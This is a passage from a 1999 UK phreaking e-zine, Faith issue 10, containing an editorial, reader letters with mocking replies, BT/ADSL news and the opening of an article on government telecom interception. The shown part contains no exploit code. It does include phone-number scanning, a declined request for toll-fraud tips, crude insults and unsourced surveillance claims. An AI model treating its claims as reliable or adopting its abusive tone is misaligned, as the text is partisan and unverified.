home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / faith / faith10.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  210.3 KB  |  5,033 lines

  1.  
  2.                                 [  D4RKCYDE  ]
  3.                                         
  4.            yyyyyssssyyyy yyyyssssyyyy      yyyy         yyyy
  5.            |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy  
  6.            :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$  
  7.            :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$  
  8.            :::|l  ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS  
  9.            ::::|  $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l  
  10.            .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| 
  11.  
  12.                       [  F41TH ISSUE TEN: OCTOBER 1999  ]
  13.  
  14. .                                                    
  15. .                                                                                                        
  16. :
  17. |
  18. +-----------[  hybrid              *   http://darkcyde.phunc.com                 
  19. +-----------[  jasun               *   http://hybrid.dtmf.org
  20. +-----------[  zomba               *   #darkcyde EFNET
  21. +-----------[  digiphreq           *   mailto: hybrid@dtmf.org
  22. +-----------[  downtime            *   mailto: hybrid@unixcode.com
  23. +-----------[  force               *   
  24. +-----------[  lowtek              *
  25. +-----------[  bodie               *
  26. +-----------[  microwire           *
  27. +-----------[  shadowx             *        FIND US ON THE PSTN, B1TCH            
  28. +-----------[  sintax              *
  29. +-----------[  shylock             *        (C)D4RKCYDE 1997,98,99+
  30. +-----------[  elaich              *
  31. +-----------[  mata                *
  32.             |                      *
  33.             +----------------------------------------------------------------+
  34.                                                                              |
  35.                                                                              :
  36.                                                                              .
  37.  
  38. So close it has no boundaries...
  39. A blinking cursor pulses in the electric darkness like a heart coursing with
  40. phosphorous light, burning beneath the derma of black-neon glass. A PHONE
  41. begins to RING, we hear it as though we were making the call. The cursor
  42. continues to throb, relentlessly patient, until...
  43.                                                                              .
  44.                                                                              :
  45.                                                                              |
  46. -+[ editorial and introduction to f41th 10              +-> jasun/hybrid <---+
  47. -+[ letters to f41th & D4RKCYDE                         +-> doods        <---+
  48. -+[ news update /bt adsl                                +-> hybrid       <---+
  49. -+[ government covert telecommunications interception   +-> hybrid       <---+
  50. -+[ DDSN intellegent network                            +-> kelticphr0st <---+
  51. -+[ guide to being arrested in the uk                   +-> bodie        <---+
  52. -+[ meridian security audit, and switch hacking         +-> hybrid       <---+
  53. -+[ sco buffer overflow lameness                        +-> darkraver    <---+
  54. -+[ making chipz                                        +-> hitman       <---+
  55. -+[ systemx internal network operations /structure      +-> hybrid/GBH   <---+
  56. -+[ digital access carrier system DACS                  +-> hybrid       <---+
  57. -+[ outness                                             +-> jasun/hybrid <---+
  58.                                                                              |
  59.                                                                              :
  60.                                                                              .
  61.                 "when we come to your town, bow down"
  62.                                 -the w00
  63.  
  64. .
  65. :
  66. |
  67. +-+[ editorial          ]+---> by jasun           <--------------------------+
  68. +-+[ D4RKCYDE           ]+---> jasun@phreaker.net <--------------------------+
  69.                                                                              |
  70.                                                                              :
  71.                                                                              .
  72.  
  73. Here we are with f41th issue 10, edited this time around by jasun. I
  74. suggested to hybrid that I would take the job of editing and compiling this
  75. issue of f41th, so he could have a break from it for a while. So, here we are
  76. again with another issue packed full with info straight from the heart of
  77. some twisted but intelligent people, who are constantly increasing their
  78. knowledge base and kindly passing their knowledge onto you!
  79.  
  80. You may have noticed some new sections in this issue, such as News and
  81. Letters. We decided that we would inlude these to let you all know some of
  82. the feedback we receive, as always some positive and some negative, everyone
  83. has their own opinions. The main thing is that by reading any issue of Faith
  84. and indeed any ezine or article, you are hopefully learning something new
  85. that you did not already know about or expanding your knowledge futher to
  86. what you already did know. Afterall, spreading knowledge to others is what
  87. it's all about... "Share what you know and learn what you don't" as they say.
  88.  
  89. Also, just a little note about some two upcoming events, Catastrophe '99 &
  90. H2K. Catastrophe '99 will be held on the 4th December '99 in Manchester,
  91. United Kingdom. It's mainly a party, but from information that is flowing
  92. around, there will be speakers and much more as well. It should be a good
  93. event, considering the success of the previous Manchester parties. I don't
  94. have a url for this event yet, but it should be up soon. More details as they
  95. are announced will be posted in the next issue of Faith.
  96.  
  97. H2K, Hope2000 will be Held in New York City, from July 14-16th next year. As
  98. this event is a little further away than Manchester, we are going to be
  99. booking travel and accomodation much earlier. A group of people are going
  100. from the UK, if you are considering it, please contact us as we can probably
  101. organsise a group discount deal if we all book together. H2K will be a 24
  102. hour event for the full three days, as far as speakers and events are
  103. concerned, check out the official conference website, http://www.h2k.net
  104.  
  105. Enjoy this issue,
  106. jasun.                                                                             :
  107.  
  108.                       " Good. Adaption. Improvisation.
  109.             But your weakness isn't your
  110.                         technique. "
  111.                                       -Morpheus/Matrix
  112.  
  113. .
  114. :
  115. |
  116. +-+[ letters to f41th   ]+--->                 <-----------------------------+
  117. +-+[ D4RKCYDE           ]+---> hybrid@dtmf.org <-----------------------------+
  118.                                                                              |
  119.                                                                              :
  120.                                                                              .
  121.  
  122. Date: Wed, 4 Aug 1999 04:53:07 +0100
  123. From: wheeler14@postmaster.co.uk
  124. To: hybrid@dtmf.org
  125. Subject: URL http://hybrid.dtmf.org/main.html
  126.  
  127. Hi, i am a relative newcomer to phreaking and i was wondering if you could
  128. just answer a simple question for me.: whilst scanning 0800892xxx i kept
  129. getting an american woman saying, "your call cannot be completed as dialed
  130. please check and try again", prey tell if you will, what the ?$"ú< does this
  131. bloody mean. i take it that these numbers are something to do with direct
  132. dialling, however i am probably totally wrong. If you could help me out with
  133. this poxy woman as i will scream if i hear her again. if you can assist i can
  134. be contacted through this mail address: wheeler14@postmaster.co.uk cheers,
  135.  
  136. MAV
  137.  
  138.         [ yo mav.. "your call cannot be completed as dialed, please check
  139.           the number and try again, 2BM".. anoying huh? Try scanning O8OO
  140.           96X-XXX, then you'll really see how anoying the stupid telco
  141.           international DMS gateway recording really is. The answer is quite
  142.           simple, where the 2BM recording is, a terminating line once
  143.           existed. Infact, I'm sure that anyone that scans will find this
  144.           2BM recording EXTREAMLY anoying, infact, going through my scans I
  145.           have just worked out that I've had to listen to that 2BM whore
  146.           2,429 times.. my advise to you: after listening to that damn
  147.           recording over and over and over and over and over again, you'll
  148.           notice a faint humming noise on the line just before the b1tch
  149.           begins to speak.. just do what I do, hang up before you have to
  150.           listen to it. If you are truely twisted and insane (like me) you
  151.           can goto www.telecom-digest.org and follow the link to a website
  152.           called "the website you have reached" where you can listen to
  153.           1OO's of telco fault/test recordings in .wav format. For those of
  154.           you who want to hear this damn recording (from the UK) dial one of
  155.           the following numbers, try to resist the urge to smash up your
  156.           telephone... O8OO 961 OO6, O8OO 961 O21. ]
  157.  
  158.  
  159.  
  160. Date: Sun, 25 Jul 1999 04:03:08 +0100
  161. From: xrayman <xrayman@freeuk.com>
  162. To: hybrid@dtmf.org
  163. Subject: subscribe
  164.  
  165.  
  166. subscribe xrayman@freeuk.com
  167.                                                                               
  168.  
  169.         [ heh ]
  170.  
  171.  
  172. Date: Thu, 29 Jul 1999 21:15:16 +0100
  173. From: tommy <tmcoy@globalnet.co.uk>
  174. To: hybrid@dtmf.org
  175. Cc: tmcoy@globalnet.co.uk
  176. Subject: phreaking
  177.  
  178.  
  179. Regarding the uk phreaking scene,
  180. I hope you could please e-mail up-to-date information on obtaining free
  181. calls from bt phoneboxes and cocots and boxing including blue, black etc (
  182. including wether any of the above are possible now in 99). As I have read
  183. alot of files on the web most if not all are outdated therefore I was
  184. hoping for you to provide some useful e-mail or irc sources because any new
  185. info is not released to the web to prevent BT who can monitor the web from
  186. holing up any loopholes. Finally, would you kindly obtain some bulletin board
  187. numbers with info on the above and comment on their usefulness.
  188.  
  189. tommy
  190.  
  191.         [ heh. tip: nothing is outdated or obsolete, people just forget how
  192.           to do shit. Phreaking is not about making free calls. I'm not
  193.           going to mail you codez. BBSs: I used to run one, I got pissed off
  194.           with ppl dialing up in the hope that when they discconect they will
  195.           have the abilty to place free calls. BBSs are rare these days, and
  196.           in most cases are aimed at people that take a more serious
  197.           approach to the 'scene' (no k0d3 kiddies) - try altavista.com
  198.           keywords "help i'm lame" or goto the library and get "toll-fraud
  199.           for dummies" ]
  200.  
  201.  
  202.  
  203.  
  204. Date: Fri, 23 Jul 1999 18:04:45 +0100
  205. From: Neon Bunny <the_neon_bunny@hotmail.com>
  206. To: hybrid@dtmf.org
  207. Subject: Faith
  208.  
  209.  
  210. I'm currently compiling a collection of files about different types of
  211. systems (e.g. Shiva-LAN-Rover, VAX etc.) and how to identify them. I'd be
  212. grateful if you'd give me permission to distribute your article from Faith 3
  213. on Shiva-LAN-Rover systems. I'll just snip the article but leave the header
  214. including the author's name & email.
  215. While on the subject of permission, I take it that it's ok to distribute the
  216. full collection of faith (1-7) at my site below, if not then let me know and
  217. I'll shift 'em.
  218. I also have a handscan of 0800 891XXX which I can send if you want it for
  219. the next faith.                                                               
  220.  
  221. NeonBunny
  222.  
  223. ---
  224. Have you seen the new BunnyBox???
  225. www.bunnybox.f9.co.uk                                                         
  226.  
  227.  
  228.         [ werd. n/p dude.. just one thing: if you decide to distro f41th on
  229.           ya box, be sure to have the latest issue linked to the following
  230.           address.. ]
  231.  
  232. <a href="http://hybrid.dtmf.org/files/faith/faith[x].zip">f41thx</a>
  233.  
  234.  
  235. This message contains non-ASCII text, which can only be displayed
  236. properly if you are running X11. What follows
  237. may be partially unreadable, but the English (ASCII) parts
  238. should still be readable.
  239. please help me iam being bothered by this lad but i cant get his ip address
  240. to bother him back could you tell me how?
  241. shaggy@corl.fsnet.co.uk
  242.  
  243.         [ ? ]
  244.  
  245. i have been reading faith zine for some time, and i was wondering if
  246. subscription is possible where some auto-bot would notify us, devoted
  247. users, of every new issue.
  248. thatnk you for your time.
  249.  
  250. --
  251. Be well,
  252. Net Runner
  253.  
  254.         [ just download it ]
  255.  
  256. just a quick one,,,,,don't take away the ascii logs,, the humour in them and
  257. the similar funny parts of f41th are the things that set you apart from the
  258. "other mags". Like for example the fun you had in #jesus. that reminded me of
  259. when i went in there,, took the piss out of the ops for not being christian
  260. enough...(i was arguing that jesus wouldn't ban ppl from the chat room)......
  261. the logs and other stuff make the readers think that the zine's being written
  262. by people we understand and emphasize with. it's nothing massive but it's one
  263. step away from the mag we can read and laugh at the same time. cheers anyway,
  264. mail us back if you want to discuss anyfing,,, or catch me on efnet
  265. - Degener8
  266.  
  267.         [ yeah/ish ]
  268.  
  269. Hi,
  270. Just a quick note to say what a great site you have got and to ask a
  271. quick question. If I wanted to obtain Tools and Equipment for research
  272. purposes to do with hacking/phreaking where could I get hold of them?
  273.  
  274. Cheers
  275.  
  276. THE FAT MAN
  277.  
  278.         [ the donut store ]
  279.  
  280.  
  281. This message contains non-ASCII text, which can only be displayed
  282. properly if you are running X11. What follows
  283. may be partially unreadable, but the English (ASCII) parts
  284. should still be readable.
  285. APT Issue 5 is now out.
  286. Download it from:
  287. http://surf.to/krash
  288.  
  289. For subscription information, email me with the subject CMD:HELP
  290.  
  291.         [ NO#@~%$!! - your magazine and its SWAT team crew can suck
  292.           my left nut. All the stuff on your site sucks, i dont wanna
  293.           know how to blow shit up, I THINK I KNOW HOW TO FUCKING RED
  294.           B4WX.... GO AWAY, AND SEEK HELP ]
  295.  
  296.  
  297.                       " Your spoon does not bend because
  298.             it is just that, a spoon.  Mine 
  299.             bends because there is no spoon,
  300.                         just my mind. "
  301.                                        -SpoonBoy/Matrix
  302.  
  303. .
  304. :
  305. |
  306. +-+[ f41th Newz         ]+---> by hybrid       <-----------------------------+
  307. +-+[ D4RKCYDE           ]+---> hybrid@dtmf.org <-----------------------------+
  308.                                                                              |
  309.                                                                              :
  310.                                                                              .
  311. /*
  312.  * UK moblie telecom companys asked to 
  313.  * cut down on cellular masks
  314.  */
  315.  
  316.  
  317.  
  318. UK cellphone companys such as Orange, one2one, cellnet etc have been told
  319. not to install to many radio masks. The fact is, we need more to improve
  320. reception, but alot of people seem to think they ruin the scenery of England.
  321. WTF?.. This is no shit, now cellular giants such as cellnet are developing
  322. anttenas that are in the shape of trees and brown in colour so they "blend
  323. in" LOL. In one area of the UK, an anttena was errected near to an old
  324. persons home, soon after, residence of the old peoples home complained that
  325. the CellNet radio mask was interfering with thier hearing-aid equipment!
  326. And of course the mask was taken down and moved, so a whole bunch of people
  327. lost cellular coverage simply because some old hag's hearing aid.. shiet@£$!
  328. what is this country! -- i want out!, wheres my ticket to NY?
  329.  
  330.  
  331.  
  332. /*
  333.  * BTs new generation of switches
  334.  * for the UK communications backbone.
  335.  */
  336.  
  337.  
  338. BT have announced a framework agreement with Ericsson for the development and
  339. supply of the next generation, high performance switches designed to meet the
  340. needs of the rapid data traffic growth in the UK. The deal is worth
  341. potentially up to £270 million and will secure BTs network capacity into the
  342. next millennium.
  343.  
  344. The new switches from Ericsson will enable BT to expand its backbone network
  345. capacity rapidly to meet the anticipated growth in Internet, high speed data
  346. and video services. The Ericsson switches will integrate seamlessly into BTs
  347. existing network.
  348.  
  349. The switches will be deployed over the next four years using state of the art
  350. technology, providing initial switching capacities of up to 160 Gigabits per
  351. second and future growth into Terabits. The first switch was scheduled to go
  352. live in June, 1999. All switches will be directly connected to BTs optical
  353. fibre SDH network, which currently has more than 600 nodes and is doubling in
  354. size every year.
  355.  
  356. Installation work to replace existing trunk switches with the new high
  357. performance switches started during 1999 and will continue over the next four
  358. years.
  359.  
  360. This investment is over and above the £800 million expenditure BT announced
  361. last May, which is being used to extend significantly the reach of BTs core
  362. Synchronous Digital Hierarchy (SDH) optical fibre transmission network and
  363. exploit Dense Wave Division Multiplexing (DWDM) technology. 
  364.  
  365.  
  366.  
  367. /*
  368.  * Oftel look into ADSL
  369.  * (about fucking time)
  370.  */
  371.  
  372.  
  373. There are many things that I dislike about BT and UK regulators such as
  374. Oftel, one of them being they all brag about "High-Tech" technologys on the
  375. UK PSTN such as ISDN, or how gratefull we should be that we _only_ have to
  376. pay 1p a minute for local calls (net access). Like, get with the program,
  377. heh. BT need to sort it out.. ISDN blows, but they seem to think its the
  378. forefront of technology.. Oh yeah, not to mention the fact that if you have
  379. a standard line, and ask BT for a second line for net access, guess what? -
  380. they wont install a second line for you, they will stick a device such as the
  381. DACS (Digital Access Carrier System) on your line which will split it into 2
  382. seperate carriers.. W0W, thanks BT, now I can join the "BT SuperHighway" at
  383. lightning speeds of a maximum of 28800bps, and courtisy of BT "SuperHighway"
  384. I get bonus CRC checksum errors!
  385.  
  386.         IF YOU ARE ONE OF THE MILLIONS OF UK BT SUBSCRIBERS THAT ASKED
  387.         BT TO INSTALL A SECOND LINE FOR YOU, CHANCES ARE YOU HAVE A
  388.         DACS II, OR WB900 UNIT MULTIPLEXING YOUR LINE.. TRY DOING A SALT
  389.         TEST FROM THE LINE.. 17070.. IT WONT WORK CUSE THAT LINE IS NON
  390.         EXISTANT. PHONE BT _NOW_ TELL THEM YOU DONT WANT THEIR PIECE OF
  391.         SHIT "HIGH TECH" DACS UNIT ON YOUR LINE.. GET WHAT YOU PAID FOR
  392.         (A REAL LINE). DACS/WB900= 28.8, TELL THEM WHERE TO GO.
  393.  
  394. note: I know someone that had a BT DACS line spliter fitted who asked BT for
  395. a SECOND line.. we phoned BT and asked why this was..
  396.  
  397.         " dood, why can I only get 28.8 on my line? "
  398.  
  399.         " you need to update your modem "
  400.  
  401.         " i have a 56k modem, it doesnt like your DACS superhighway "
  402.           blah blah blah..
  403.  
  404.          then they said... (get aload of this shit)
  405.  
  406.         " The reason the DACS II system is deployed is because we have
  407.           concerns about the environment, if everyone had 2 lines it would
  408.           be wires everywhere.... "
  409.  
  410.           AND..??
  411.  
  412.  
  413. BT seem to think that including E.T. in their lame-ass adverts will impress
  414. customers with their services.. The money they spent on the copyright rights
  415. to show E.T. was probably enough to update an exchange, but thats BT for you,
  416. they'll be selling baked-bean cans with string attached to them soon..
  417.  
  418.         THEY DONT CARE ABOUT UK TELECOMS.. THEY JUST WANT YOUR 1P p/m
  419.  
  420. Anyways, I'm getting worked up here, so I'm going to continue with the newz..
  421. The UK telecoms regulator Oftel, has proposed that ADSL should be present in
  422. rural and "disadvantaged" areas of the UK, therefore BT have (proposed) that
  423. 400 exchanges will be updated to carry the "new" technology by March 2000..
  424. Areas that will benifit from ADSL (Asymmetric Digital Subscriber Line) are
  425. as follows:
  426.  
  427.         London          *  
  428.         Cardiff         *
  429.         Belfast         *
  430.         Coventry        *
  431.         Manchester      *
  432.         Newcastle       *
  433.         Leeds           *
  434.         Edinburgh       *
  435.         Glasgow         *
  436.  
  437. Heh, BT need to sort it out.. considering ppl in NewYork are able to get 7
  438. Mbit/sec ADSL connections (equivalent to 1,500 BT "superhighway" connections)
  439. sn1per$/sbin/ping :( For more information regarding Oftel and BT goto:
  440. www.oftel.gov.uk or www.bt.com
  441.  
  442.  
  443.  
  444. /*
  445.  * PLE (phone loosers of england)
  446.  * appologise to D4RKCYDE... 
  447.  */
  448.  
  449.  
  450. [ taken from http://www.phoneloosers.com ]
  451. [ phoneloosers of england ]
  452.  
  453. 03/09/1999 PLE Appologises to D4rkcyde
  454.  
  455. "We want to apologise to d4rkcyde for including some of their scanned numbers
  456. in the PLE Phone directory without getting their permission. OKaos sent you
  457. an E-mail but when you never replied he stupidly took this as a yes, and this
  458. was obviously wrong. OKaos has now been relieved of his duties of Editor - we
  459. felt this was the best thing to do. If we could find any of your important
  460. members on IRC or anywhere else for that matter we would apologise in person,
  461. but as we can't even find your site anymore this will have to do. Sorry Guys,
  462. hope you can understand / forgive..."
  463.  
  464.  
  465.         irc: #darkcyde efnet
  466.         url: http://darkcyde.phunc.com
  467.  
  468.  
  469.                        " Fuckin' idiots don't know shit. "
  470.  
  471.                                        -Neo/Matrix
  472. .
  473. :
  474. |
  475. +-+[ Government telecommunications interception ]+---> by hybrid <-----------+
  476. +-+[ D4RKCYDE           ]+---------------------------> hybrid@dtmf.org <-----+
  477.                                                                              |
  478.                                                                              :
  479.                                                                              .
  480. BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]
  481. Covert Government/Military Interception of
  482. International Telcommunications. (Pure Paranoia)
  483. Written for f41th magazine, October 1999
  484. by hybrid <hybrid@dtmf.org hybrid@ninex.com>
  485.  
  486.  
  487.  
  488.    Part I
  489. 1. Introduction
  490. 2. Communications Intelligence (COMINT) and the NSA
  491.         a) UKUSA Alliance
  492. 3. The Covert Interception of International Telecommunications
  493.         a) International Leased Carrier (ILC) Interception
  494.         b) High Frequency Radio Interception
  495.         c) Interception of Microwave Radio Relays
  496.         d) Interception of Submerged Telecommunications Cables
  497.         e) Covert Communications Satellites
  498.         f) Communications Techniques 
  499.                 o  Operation SHAMROCK
  500.                 o  More High Frequency Radio Interception
  501.                 o  The Space interception of InterCity Networks
  502.                 o  SIGNIT Satellites
  503.  
  504.    Part II
  505. 5. Introduction to part II
  506.         a) Submarine Cable Interception
  507.         b) Covert Interception of the Internet Protocol
  508. 6. Covert Collection of High Capacity Signals
  509.         a) New Satellite Networks/Systems
  510.         b) ILC Processing Techniques
  511. 7. Hardcore Telecommunications Covert Interception 
  512.         a) Broadband (High Capacity Multi-Channel) Communications
  513.         b) Covert Telecommunications Interception Equipment
  514.                 o  Extraction of Wideband Signals and Data Analysis
  515.                 o  Covert Data Processing, Fax Transmission Analysis
  516.                 o  Multi Protocol Traffic Analysis Techniqes
  517.         c) Speech Recognition and Voice Interception
  518.                 o  Advanced Speech Recognition, Real CallerID
  519. 8. Closing, Summerisation 
  520.         a) My PGP Key ;>
  521.  
  522.  
  523.  
  524. Part I
  525. ------
  526.  
  527. 1. Introduction
  528. ===============
  529.  
  530. Are you paranoid? You damn well should be. I've recently come accross some
  531. very disturbing facts about how international covert governemt organisations
  532. intercept, filter and colate data from international communication protocols
  533. and networks. This article is only the very tip of the iceberg, their is no
  534. way I could possibly cover the wide spectrum of "big brother" activity that
  535. shadows over the communication networks that are deployed at present, to do
  536. so would require a whole database. The fact is big brother IS watching you,
  537. not just you, but also other governments and echonomical bodies. In this
  538. file I will discuss the different, very covert techniques that are deployed
  539. by certain agencys and alliances to efectivly intercept any type of public,
  540. or supposid "classified" data/voice transmission. After reading this article,
  541. you'll probably think twice before placing a phone call.
  542.  
  543.  
  544. 2. Communications Intelligence (COMINT) and the NSA
  545. ===================================================
  546.  
  547.  
  548. COMINT is an abbreviation for Communications Intellegence. The covert
  549. interception of telecommunications has existed for a very long time, and
  550. began around about the same time that public telecommunications became
  551. widely available. It is evident that every single "technologicly advanced"
  552. country in the world participates in the covert interception of foreign
  553. communication mediums. I would define it as an ongoing game of counter-
  554. intellegence, where superpower nations are spying on each other, spying on
  555. each other. The scary thing is, it's not just diplomatic communications that
  556. are being intercepted, in most cases, an entire nations telecommunications
  557. infastructer is being monitored, both from remote locations, and from our
  558. own intellegence organistaions spying on us. The NSA openly admit to such
  559. activity, although would probably deny any "local" communication interception
  560. techniques. COMINT is in the same intelllegence fammily as SIGNIT (Signals
  561. Intellegence) which involves the interception of signal emmisions from
  562. sources such as radar emmisions.
  563.  
  564. Obvious COMINT communications targets: (interception)
  565.  
  566.         o  military communications
  567.         o  diplomatic communications
  568.         o  economic intellegence
  569.         o  scientific intellegence
  570.         o  drug trafficking
  571.         o  organisied crime
  572.         o  severe fraud
  573.         o  terrorism
  574.  
  575. Side note: hacking, phreaking, participation in "underground" hacking
  576. collectives would be defined as organised crime, and in some cases defined
  577. as terrorism. (they have a real nice way of classifying things)
  578.  
  579. a) UKUSA Alliance
  580.  
  581. USSS (United States Signit System) is made up of the NSA (National Security
  582. Agency), collective sub-units known as the "CSS" (Central Security Service),
  583. aswell as some parts of the CIA and surrrounding organisations/bodies. After
  584. the second world war in 1947, the US made and aggrement with the UK to
  585. commense international intellegence operations world wide. Other English
  586. speaking countrys where allied into the UKUSA aggrement as second partys,
  587. they include Canada, NewZealand and Austailia. The UKUSA intellegence
  588. alliance was not exposed until earlier this year (March 1999), when the
  589. Austrailian government confirmed its deployment of DSD (Defense Signals
  590. Directorate) and admited to being part of the UKUSA colaboration of
  591. intellegence gathering.
  592.  
  593.  
  594. 3. The Covert Interception of International Telecommunications
  595. ==============================================================
  596.  
  597.  
  598. a) International Leased Carrier (ILC) Interception
  599.  
  600. A knowledgable phreak will know how easy it is to intercept supposid private
  601. telecommunications, we all know that the US PSTN (Public Switched Telephone
  602. Network) is made up of RBOCs (Regional Bell Operating Companys) which all
  603. deploy multiple levels of switching architecture and signal protocols. For
  604. over 80 years, incomming and outgoing international telecommunications
  605. traffic passing through International eXchange Bounderys have been
  606. intercepted and filtered for an initative known as "National Security". All
  607. US RBOCS have strong links with COMINT, and IXCs (Inter eXchange Carriers)
  608. such as AT&T have ties with goverment communication collectives. COMINT
  609. organistaions refere to such carrier providers as ILCs (International
  610. Leased Carriers), and would obviously have to work closly with such providers
  611. where telecommunications interception is involved. 
  612.  
  613. b) High Frequency Radio Interception
  614.  
  615. The majourity of the worlds international contempory telecommunications
  616. networks are made up of optical transmission protocols, but before this,
  617. most international telecommunications where conducted via HF transmission
  618. (Higher Freqency) and was used both for public communication aswell as
  619. diplomatic and military communications.
  620.  
  621.  
  622.       ------------x-----------------------x-----------------------x
  623.                 /   \                   /   \                   /
  624.               /       \               /       \               /
  625.             /           \           /           \           /
  626.           /               \       /               \       /
  627.         /                   \   /                   \   /
  628.       x-----------------------x-----------------------x-------------
  629.       x)                      y)                       z)
  630.  
  631.  
  632. In the above diagram, (x) is transmitting to (z). The HF signal is bouncing
  633. from the Earths ionosphere back down to (y), then back to the ionosphere,
  634. down to (z). Incididently, in this scenario, (y) is the dude in the middle,
  635. incercepting the transmission before it reaches (z).
  636.  
  637. Here, the interception of transmission was reletivly straight forward because
  638. HF radio transmissions are bounced from the Earths ionosphere and back down
  639. to the Earths surface, forming a zigzag type path around the world. This
  640. provided ample space for a primitive "man in the middle" interception of the
  641. reception of such data.
  642.  
  643. c) Interception of Microwave Radio Relays
  644.  
  645. Microwave radio was deployed in the 1950s as a means to provide higher-
  646. cappacity inter-city communications, implementing telephony and televison.
  647. Microwave parabolic dishes are placed around 50km apart from each other, as
  648. a means of communicaion relay stations. Later I will discuss how such a
  649. communications medium can be intercepted.
  650.  
  651. d) Interception of Submerged Telecommunications Cables
  652.  
  653. Early international telecommunications where very primitive compared to what
  654. we have today, and only allowed a maximum capacity of 100 telephone calls
  655. on similtanious channels. Today Optical Fibre transmission systems are
  656. deployed as part of the world wide PSTN, and can handle 5Gbps of similtanious
  657. data transmission, which is 60,000 phone calls occuring similtaniously, which
  658. is why we no longer require operators to place international calls.
  659.  
  660. e) Covert Communications Satellites
  661.  
  662. Because of the nature of microwave emmisions, they do not reflect off of
  663. the Earths ionosphere like HF radio transmissions. Instead, they penetrate
  664. the Earths atmosphere and are emited off into space. This is where the covert
  665. satelites come into the picture.
  666.                             
  667.  
  668.                               x  salelite
  669.                             /   \
  670.                           /       \
  671.                         /           \
  672.                       /               \
  673.                     /                   \
  674.       ------------x-----------------------x------------ ionosphere
  675.                 /                           \                   
  676.               /                               \              
  677.             /                                   \           
  678.           /                                       \       
  679.         /                                           \   
  680.       x-----------------------------------------------x- earths surface
  681.       x)                                              z)
  682.  
  683.  
  684. The most popular satelite setup are those that operate in geo-stationary
  685. orbit, or (the clark belt) and are provided for broadcasting purposes. The
  686. largest collection of communications satelites in orbit are the COMSATs and
  687. are operated by the International Telecommunications Satelite organisation
  688. (Intelsat). The latest addition of telecommunications satelites can handle
  689. over 90 thousand similtanious calls each. 
  690.  
  691. f) Communications Techniques 
  692.  
  693. Before 1970, the majourity of communications systems where of anolouge nature
  694. and utilised continuous wave technique. Now, in all majour communication
  695. systems are digitaly derived, and provide a much higher capacity. The highest
  696. capacity systems are for use of internet backbone usage (STM-1/OC-3) and can
  697. operate at data rates of 155Mbs (Million bits per second) which is the
  698. equivalent to the transmission of 1 thousand books a minute. I'll cover these
  699. transmission techniques in more detail in the technical part of this file.
  700. Where this type of digital communication is deployed COMINT organisations
  701. cannot intercept data unless they have diect access to the communications
  702. channels that the data travels over. The data is usually encrypted, but no
  703. big deal for such an collective as COMINT, so they obtain access to these
  704. communications channels with (or without) the prior co-operation of the
  705. carrier provider.
  706.  
  707. o  Operation SHAMROCK
  708.  
  709. The NSA are well known for systematically gathering telecommunications
  710. traffic from offices of majour cable companys. The interception of cable
  711. traffic in the US is refered to as "operation shamrock", and until recently
  712. remained un-exposed for over 30 years. In 1975 an NSA director admitted to
  713. the US house of representatives that such operations do exist within the NSA.
  714.  
  715. "..The NSA systematically intercepts international communications, both voice
  716. and cable" "messages to and from American citizens have been picked up in the
  717. course of gathering foreign intelligence". "...was obtained incidentally in
  718. the course of NSA's interception of aural and non-aural (e.g., telex)
  719. international communications and the receipt of GCHQ-acquired telex and ILC
  720. (International Leased Carrier) cable traffic (SHAMROCK)..."
  721.  
  722. o  More High Frequency Radio Interception
  723.  
  724. HF radio transmissions are easy to intercept, in the sense that all you
  725. need is the appropraite equipment, and an area which is located in a quiet
  726. radio location. Up until 1980 the NSA and the UK's GCHQ used HF radio
  727. interception equipment to capture European HF communication on a base in
  728. Scotland. The equipment used then was a 400 meter in dialmeter antenna, and
  729. was designed to be omnidirectional (capture emitions from every possible
  730. angle). Their is a secret base in the UK at Chicksands which is operated by
  731. the NSA and DODJOCC, It's purpose is to collect and intercept Soviet and
  732. Warsaw Pact air force communications, and also to collect ILC and "NDC"
  733. (Non-US Diplomatic Communications).
  734.  
  735. o  The Space interception of InterCity Networks
  736.  
  737. Long distance microwave involves the implementation of many transmitters
  738. and relay stations. When a microwave transmission takes place, the recieving
  739. end only absorbs a small fraction of the orional signal strength, the parts
  740. of the microwave transmission that the reciever didn't pick up pass through
  741. the Earths atmosphere into space as discussed before. Therefore, contempory
  742. microwave communications are intercepted by covert intellegence gathering
  743. satelites that are mounted 80 degrees longditude of the horizon. At present,
  744. their are many secret satelites operating both in geo-syncronous orbit aswell
  745. as satelites following mission paths that gather as much microwave
  746. communication traffic as possible and relay back to secret installations on
  747. Earth. 
  748.  
  749. o  SIGNIT Satellites
  750.  
  751. The CIA first launched the SIGINT satelite program back in 1967 which lasted
  752. until 1985. The satelites where operated from remote ground installations in
  753. Austrailia and implemented parabolic antenna which where able to unfold once
  754. in orbit, initially the satelites intercepted transmisisons from the VHF
  755. radio band. To this date, similar satelites are in use, codenamed MAGNUM and
  756. ORION, they are designed to intercept and filter multiple communications
  757. methods on Earth such as VHF radio, cellular and mobile phones, pagers,
  758. and also mobile data links, packet radio etc. The idea of this is fairly
  759. daunting, basically if you page your girlfriend, chances are the pager radio
  760. signal will be intercepted but probably filtered as it would be of no
  761. relevance to "national security". This is not some paranoia/conspiracy
  762. theory, this is fact. The IOSA system (Intergrated Overhead Signet
  763. Architecrure) is very much at large to this date, and is controled from
  764. ground level at the following locations accross the world:
  765.  
  766.         o Buckley Field, Denver, Colorado
  767.         o Pine Gap, Australia
  768.         o Menwith Hill, England
  769.         o Bad Aibling, Germany
  770.  
  771. Each "secret" installation is rumoured to cost alot of money to run, somthing
  772. in the line of 1 billion dollars each. In 1998, the US National
  773. Reconnaissance Office (NRO) said it would combine the three separate classes
  774. of Sigint satellites into an Integrated Overhead Sigint Architecture (IOSA)
  775. in order to " improve Sigint performance and avoid costs by consolidating
  776. systems, utilising ... new satellite and data processing technologies".
  777. Because of this new spy satelite setup in earth orbit, the US can now use
  778. its newly aquired technology to intercept ANY mobile communications source,
  779. including city to city traffic accross the globe. The main intension of these
  780. satelites is however to concentrate on foreign military and diplomatic
